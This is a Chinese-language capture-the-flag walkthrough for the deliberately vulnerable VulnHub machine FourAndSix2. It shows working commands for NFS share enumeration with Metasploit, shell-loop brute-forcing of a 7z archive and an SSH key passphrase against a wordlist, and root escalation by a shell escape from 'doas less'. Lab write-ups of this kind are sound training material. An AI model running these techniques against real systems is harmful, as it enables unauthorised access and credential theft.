0x01 简介
FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息
FourAndSix2.镜像下载地址:
https://download.vulnhub.com/fourandsix/FourAndSix2.ova
0x02 信息收集
1.通过存活主机发现,确定目标机器IP
2.端口扫描发现
3.发现开放nfs服务,搜索漏洞利用代码
0x03 漏洞利用
msf5 > search nfs
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/freebsd/nfsd/nfsd_mount normal No FreeBSD Remote NFS RPC Request Denial of Service
1 auxiliary/scanner/nfs/nfsmount normal Yes NFS Mount Scanner
2 exploit/netware/sunrpc/pkernel_callit 2009-09-30 good No NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow
3 exploit/osx/local/nfs_mount_root 2014-04-11 normal Yes Mac OS X NFS Mount Privilege Escalation Exploit
4 exploit/windows/ftp/labf_nfsaxe 2017-05-15 normal No LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow
5 exploit/windows/ftp/xlink_client 2009-10-03 normal No Xlink FTP Client Buffer Overflow
6 exploit/windows/ftp/xlink_server 2009-10-03 good Yes Xlink FTP Server Buffer Overflow
7 exploit/windows/nfs/xlink_nfsd 2006-11-06 average No Omni-NFS Server Buffer Overflow
msf5 > use auxiliary/scanner/nfs/nfsmount
msf5 auxiliary(scanner/nfs/nfsmount) > show options
Module options (auxiliary/scanner/nfs/nfsmount):
Name Current Setting Required Description
---- --------------- -------- -----------
PROTOCOL udp yes The protocol to use (Accepted: udp, tcp)
RHOSTS yes The target address range or CIDR identifier
RPORT 111 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/nfs/nfsmount) > set rhosts 192.168.190.134
rhosts => 192.168.190.134
msf5 auxiliary(scanner/nfs/nfsmount) > run
[+] 192.168.190.134:111 - 192.168.190.134 NFS Export: /home/user/storage []
[*] 192.168.190.134:111 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/nfs/nfsmount) >
查看目标系统可挂载目录
或者使用showmount -e 192.168.190.134 查看目标系统可挂载目录
mount -t nfs 192.168.190.134:/home/user/storage /mnt # 将目标机器/home/user/storage挂载本地
发现备份文件
7z解压:
# 7z e yajiu.7z --- 不实用
这条命令是将yajiu.7z中的所有文件解压出来,e是解压到当前路径
# 7z x yajiu.7z --- 正确的解压方法
这条命令是将yajiu.7z中的所有文件解压出来,x是解压到压缩包命名的目录下
使用 7z x backup.7z 解压备份文件 ,居然提示需要密码$$
2.压缩包爆破
root@kali:/mnt# rar
rar2john rarp rarun2
root@kali:/mnt# rar
rar2john rarp rarun2
root@kali:/mnt# apt-get install rarcrack
rarcrack使用方法
执行命令: rarcrack 文件名 --threads 线程数 --type rar|zip|7z
也可以使用7z破解脚本 https://github.com/exexute/PythonScaffold/tree/PythonScaffold_0.1/enum_violence/file_enum
Usage:
./7z-crack.sh
Example:
./7z-crack.sh /tmp/backup.7z /usr/share/wordlists/rockyou.txt
How to use id_rsa-crack.sh?
Usage:
./id_rsa-crack.sh
Example:
./id_rsa-crack.sh /tmp/id_rsa /usr/share/wordlists/rouckyou.txt
7z-crack.sh脚本:
cat $2 | while read line;do if 7z e $1 -p"$line" 1>/dev/null 2>/dev/null;then echo "FOUND PASSWORD:"$line;break;fi;done
破解出了密码:chocolate
解压出来一堆HelloKitty,还有一对公钥(id_rsa.pub)和私钥(id_rsa)。
通过查看公钥找到用户名,将私钥拷贝到/root/.ssh目录,尝试使用RSA私钥登录
无法登录,还需要输入密码
使用id_rsa-crack.sh工具破解id_rsa文件的密码
https://github.com/exexute/PythonScaffold/blob/PythonScaffold_0.1/enum_violence/file_enum/id_rsa-crack.sh
id_rsa-crack.sh脚本:
cat /usr/share/wordlists/rockyou.txt | while read line;do if ssh-keygen -p -P $line -N $line -f /tmp/test/id_rsa 1>/dev/null 2>/dev/null;then echo "PASSWORD FOUND : "$line;break;fi;done;
使用ssh登录目标机器后发现目标系统是OpenBSD6.4,
搜索未发现6.4内核存在提权漏洞。
使用find命令来定位设置了SUID的文件
find / -perm -u=s -type f 2>/dev/null
doas是BSD系列系统下的权限管理工具,类似于Debian系列下的sudo命令,我们可以利用它来提权
查看doas的配置文件doas.conf,可以看到doas 允许用户以root权限通过less 查看/var/log/authlog日志文件
fourandsix2$ cat doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
doas /usr/bin/less /var/log/authlog
使用doas查看到日志信息,此时按v进行编辑模式,退出编辑模式,输入!/bin/sh提升到root权限
在root目录下发现flag.txt,acd043bc3103ed3dd02eee99d5b0ff42